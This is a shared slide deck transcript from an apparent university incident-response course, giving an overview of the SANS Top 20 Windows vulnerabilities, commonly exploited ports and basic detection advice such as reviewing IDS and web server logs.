Windows Exploits Overview and Common Vulnerabilities

lesson 12 n.w
1 / 31
Embed
Share

Discover the top 20 common Windows exploits, vulnerable ports, and critical Internet security vulnerabilities as outlined in the SANS Top 20 list. Explore the risks associated with services like Internet Information Services (IIS) and how attackers exploit these vulnerabilities. Learn about failure to handle unanticipated requests, buffer overflows, and other security weaknesses that could leave your system exposed.

  • Windows Exploits
  • Vulnerabilities
  • SANS Top 20
  • Internet Security
  • IIS
rayaanacharya
raup216 Follow

Uploaded on | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.

Download Presentation

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.

E N D

Presentation Transcript

  1. Lesson 12 Common Windows Exploits

  2. Overview Top 20 Exploits Common Vulnerable Ports Detecting Events UTSA IS 6353 ID and Incident Response

  3. SANS Top 20 List Publish list of the Twenty Most Critical Internet Security Vulnerabilities www.sans.org/top20 Thousands use this list to close up holes in their system Most incidents traced back to Top 20 list UTSA IS 6353 ID and Incident Response

  4. SANS Top 20 List Based on facts, attackers are opportunistic take the easiest and most convenient route exploit the best-known flaws with the most effective and widely available attack tools count on organizations not fixing the holes UTSA IS 6353 ID and Incident Response

  5. SANS Top 20 List List broken down into six sections Commonly exploited vulnerable services in Windows, Unix, Web Apps, etc Let s check it out UTSA IS 6353 ID and Incident Response

  6. W1: Internet Information Services (IIS) IIS prone to vulnerabilities in three major classes Failure to handle unanticipated requests Buffer overflows Sample applications Target port: TCP Port 80 (http) UTSA IS 6353 ID and Incident Response

  7. Failure to Handle Unanticipated Requests IIS has a problem handling improperly formed HTTP requests Web folder traversal (unicode) Allows view of the source code of scripted applications view of files outside the Web document root view of files Web server has been instructed not to serve execution of arbitrary commands on the server deletion of files, uploading of rootkits, creation of backdoors UTSA IS 6353 ID and Incident Response

  8. Buffer Overflows Many ISAPI and SSI extensions vulnerable to buffer overflows .asp / .htr / .idq / printer A carefully crafted request from a remote attacker may results in Denial of Service Execution of arbitrary code and/or commands in the Web server s user context through the IUSR_servername account (like anonymous) UTSA IS 6353 ID and Incident Response

  9. W2: Microsoft SQL Server Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain information alter database content compromise SQL servers compromise server hosts There s Was an MSSQL worm released in May 2002 UTSA IS 6353 ID and Incident Response

  10. W2: Microsoft SQL Server Target port: TCP port 1433 OS s affected Microsoft SQL Server 7.0 Microsoft SQL Server 2000 Microsoft SQL Server Engine 2000 UTSA IS 6353 ID and Incident Response

  11. W2: Microsoft SQL Server How to detect a compromise: First thing you ll see is the probing or fishing for information Probes on port 1433 Attacker is looking for those boxes that respond positively to a probe on port 1433 tells them box is listening (or has the port open) on port 1433 UTSA IS 6353 ID and Incident Response

  12. W3: General Windows Authentication Accounts with No Passwords or Weak Passwords Only protection is to have a strong password and good password habits With advent of Windows XP consider everyday accounts at user privilege UTSA IS 6353 ID and Incident Response

  13. W3: LAN Manager Authentication Most current Windows environments have no need for LAN Manager (weak hashing) Most use NTLM now But Windows NT, 2000, and XP do have LM by default LM has a very weak encryption scheme Won t take a hacker long to crack passwords UTSA IS 6353 ID and Incident Response

  14. W3: Unprotected Windows Networking Shares (NetBios) OS s affected: Windows 95, Windows 98, Windows NT, Windows Me, Windows 2000, and Windows XP Main objective: gather info about guest host names try these guest host names with null passwords until one works attacker will then attempt to download the entire database of userid s and/or passwords UTSA IS 6353 ID and Incident Response

  15. W4: Internet Explorer Consequences can include Disclosure of cookies Disclosure of local files or data * Execution of local programs * Download and execution of arbitrary code * Complete takeover of vulnerable system * * Most Critical UTSA IS 6353 ID and Incident Response

  16. W4: Internet Explorer Default web browser installed on MS Windows platforms All existing IE s have critical vulnerabilities A malicious web administrator can design web pages to exploit these vulnerabilities Just need someone to browse the web page UTSA IS 6353 ID and Incident Response

  17. W4: Internet Explorer Vulnerabilities can be categorized into multiple classes Web page spoofing ActiveX control vulnerabilities Active scripting vulnerabilities MIME-type and content-type misinterpretation Buffer overflows UTSA IS 6353 ID and Incident Response

  18. W5: Unprotected Windows Networking Shares (NetBios) MS Windows provides a host machine with the ability to share files or folders across a network Underlying mechanism of this feature is the Server Message Block (SMB) protocol, or the Common Internet Files System (CIFS) protocol Target Port: TCP Port 139 UTSA IS 6353 ID and Incident Response

  19. W5: Anonymous Logon -- Null Sessions This vulnerability is very similar to the one described before in Netbios Attacker is looking for a host name with a null password Attacker uses IPC$ (called IPC shares) with a double-double quote ( ) in place of a password UTSA IS 6353 ID and Incident Response

  20. W6: Microsoft Data Access Components (MDAC)--Remote Data Services RDS component in older versions of MDAC has flaws that allow a remote user to run commands locally with administrative privileges This exploit is readily used to deface Web pages Check Web Server Logs to make sure UTSA IS 6353 ID and Incident Response

  21. W7: Windows Scripting Host (WSH) Permits any text file with a .vbs extension to be executed as a Visual Basic script A typical worm propagates by including a VBScript as the contents of another file and executes when that file is viewed or in some cases previewed UTSA IS 6353 ID and Incident Response

  22. The Other 3 W8: Outlook and Outlook Express W9: P2P File Sharing W10: Simple Network Mgt Protocol UTSA IS 6353 ID and Incident Response

  23. Common Vulnerable Ports Login Services telnet (port 23/tcp) SSH (port 22/tcp) FTP (port 21/tcp) NetBIOS (port 139/tcp) rlogin (port 512 - 514/tcp) UTSA IS 6353 ID and Incident Response

  24. Common Vulnerable Ports RPC and NFS portmap/rpcbind (port 111/tcp and udp) NFS (port 2049/tcp and udp) lockd (port 4045/tcp and udp) Xwindows port 6000/tcp through 6255/tcp UTSA IS 6353 ID and Incident Response

  25. Common Vulnerable Ports Naming services DNS (port 53/udp) for all machines that are not DNS servers DNS (port 53/tcp) for zone transfer requests LDAP (port 389/tcp and udp) UTSA IS 6353 ID and Incident Response

  26. Common Vulnerable Ports Mail SMTP (port 25/tcp) for all machines that are not external mail relays POP (port 109/tcp and port 110/tcp) IMAP (port 143/tcp) UTSA IS 6353 ID and Incident Response

  27. Common Vulnerable Ports Web HTTP (port 80/tcp) SSL (port 443/tcp) except to external Web servers HTTP proxies port 8000/tcp port 8080/tcp port 8888/tcp UTSA IS 6353 ID and Incident Response

  28. Common Vulnerable Ports Small services ports below 20/tcp and udp time (port 37/tcp and udp) Miscellaneous TFTP (port 69/udp) Finger (port 79/tcp) NNTP (port 119/tcp) UTSA IS 6353 ID and Incident Response

  29. Common Vulnerable Ports Miscellaneous (continued) NTP (port 123/udp) LPD (port 515/tcp) syslog (port 514/udp) SNMP (port 161/tcp and udp, and port 162/tcp and udp) BGP (port 179/tcp) SOCKS (port 1080/tcp) UTSA IS 6353 ID and Incident Response

  30. Common Vulnerable Ports ICMP block incoming echo requests (ping and Windows traceroute) block outgoing echo replies, time exceeded, and destination unreachable except packet too big messages UTSA IS 6353 ID and Incident Response

  31. How To Detect and Investigate http://www.sans.org/critical-security- controls/vendor-solutions/ http://www.sans.org/critical-security-controls/ Run an IDS and review logs for common signatures especially IIS hacks Aggressively review web server logs Ensure FTP application logging turned on then review FTP logs Know your network and know what is abnormal UTSA IS 6353 ID and Incident Response

Related


Overview of UTSA's IS-6353 Incident Response Course

Overview of UTSA's IS-6353 Incident Response Course

elestren

More Related Content